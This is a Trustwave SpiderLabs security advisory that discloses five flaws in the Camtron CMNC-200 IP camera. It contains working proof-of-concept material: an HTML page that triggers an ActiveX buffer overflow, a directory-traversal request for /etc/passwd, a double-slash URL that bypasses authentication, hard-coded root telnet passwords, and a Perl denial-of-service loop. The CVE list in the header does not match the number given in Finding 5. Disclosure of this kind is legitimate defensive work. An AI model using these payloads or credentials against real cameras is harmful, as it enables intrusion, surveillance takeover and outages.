Trustwave's SpiderLabs Security Advisory TWSL2010-006:
Multiple Vulnerabilities in Camtron CMNC-200 IP Camera

https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt

Published: 2010-11-12
Version: 1.0

Vendors:
Camtron (http://www.camtron.co.kr/)
TecVoz (http://www.tecvoz.com.br/)
Products: Camtron CMNC-200 Full HD IP Camera, TecVoz CMNC-200
Megapixel IP Camera, and other Camtron CMNC-200 based OEM products
Version(s) affected: Enc: V1.102A-008 / Board ID 66

Description:
Camtron CMNC-200 Full HD is a line of professional IP cameras for
corporate environments. The most notable features are full HD support
(1920 x 1080), dual streaming, 10x optical zoom, SD card input, input
and output alarm sensor, and integration with different DVR solutions.

Source: http://www.camtron.co.kr
Credit: Wendel G. Henrique of Trustwave's SpiderLabs

CVE: CVE-2010-4230
     CVE-2010-4231
     CVE-2010-4232
     CVE-2010-4233
     CVE-2010-4244

Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230

The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.

The example code below triggers the vulnerability.

<html>
<head><title>IPcam POC</title>
<script>
function Check(){
    var bf1 = 'A';
    while (bf1.length <= 6144) bf1 = bf1 + 'A';
    obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.


Finding 2: Directory Traversal in Camera Web Server
CVE: CVE-2010-4231

The CMNC-200 IP Camera has a built-in web server that
is enabled by default. The server is vulnerable to directory
transversal attacks, allowing access to any file on the
camera file system.

The following example will display the contents of
/etc/passwd:

GET /../../../../../../../../../../../../../etc/passwd
HTTP/1.1

Because the web server runs as root, an attacker can read
critical files like /etc/shadow from the web-based
administration interface. Authentication is not required for
exploitation.

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.


Finding 3: Web Based Administration Interface Bypass
CVE: CVE-2010-4232

The CMNC-200 IP Camera has an administrative web
interface that does not handle authentication properly.
Using a properly formatted request, an attacker can bypass
the authentication mechanism.

The first example requires authentication:
http://www.ipcamera.com/system.html

When a second forward slash is placed after the hostname,
authentication is not required.
http://www.ipcamera.com//system.html

This vulnerability allows an attacker to take full control of
the IP Camera.

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.


Finding 4: Undocumented Default Accounts
CVE: CVE-2010-4233

The CMNC-200 IP Camera has undocumented default
accounts on its Linux operating system. These accounts can
be used to login via the cameras telnet interface, which
cannot be normally disabled. The usernames and passwords are
listed below.

User: root     Password: m
User: mg3500   Password: merlin

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.


Finding 5: Camera Denial of Service
CVE: CVE-2010-4234

The CMNC-200 IP Camera has a built-in web server that
is vulnerable to denial of service attacks. Sending multiple
requests in parallel to the web server may cause the camera
to reboot.

Requests with long cookie header makes the IP camera reboot a few
seconds faster, however the same can be accomplished with requests
of any size.

The example code below is able to reboot the IP cameras in
less than a minute in a local network.

#!/usr/bin/perl

use LWP::UserAgent;

while (1 == 1){

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.6)");

$req = HTTP::Request->new(GET => 'http://192.168.10.100');
$req->header(Accept =>
"text/xml,application/xml,application/xhtml+xml,text/html
;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5");
$req->header("Keep-Alive" => 0);
$req->header(Connection => "close");
$req->header("If-Modified-Since" => "Mon, 12 Oct 2009
02:06:34 GMT");
$req->header(Cookie =>
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
my $res = $ua->request($req);

}

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.

Vendor Communication Timeline:
10/7/10 - Vendor contact attempted
10/21/10 - Vendor contact attempted
11/1/10 - Vendor contact attempted
11/11/10 - CVE numbers obtained
11/12/10 - Advisory public release

Revision History:
1.0 Initial publication

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave's SpiderLabs:
SpiderLabs is the advance security team at Trustwave responsible for
incident response and forensics, ethical hacking and application security
tests for Trustwave's clients. SpiderLabs has responded to hundreds of
security incidents, performed thousands of ethical hacking exercises and
tested the security of hundreds of business applications for Fortune 500
organizations. For more information visit
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.